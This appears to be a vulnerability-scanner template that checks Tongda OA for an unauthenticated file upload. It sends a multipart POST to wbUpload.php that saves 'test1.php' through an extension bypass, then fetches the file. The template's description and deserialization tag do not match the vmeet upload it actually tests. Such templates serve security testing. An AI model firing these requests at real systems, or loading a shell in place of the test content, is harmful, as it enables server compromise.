id: TongDa-15

info:
  name: 通达OA vmeet存在前台任意文件上传漏洞
  author: pussycat0x
  severity: high
  description: |
    通达OA /module/ueditor/php/action_crawler.php存在前台任意文件上传漏洞
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="通达OA网络智能办公系统"
  tags: TongDa,OA,反序列化
request:
  - raw:
      - |
        POST /general/vmeet/wbUpload.php?fileName=test1.php+ HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------307456622713326098592248556830
        Content-Length: 223
        Origin: null
        Connection: close
        Upgrade-Insecure-Requests: 1
          
        -----------------------------307456622713326098592248556830
        Content-Disposition: form-data; name="Filedata"; filename="1.png"
        Content-Type: image/png
          
        123
        -----------------------------307456622713326098592248556830--
      - |
        GET /general/vmeet/wbUpload/test1.php HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
        Accept-Encoding: gzip, deflate
        Connection: close
        Content-Length: 2
    matchers-condition: and
    matchers:
      - type: status
        part: status_1
        status:
          - 200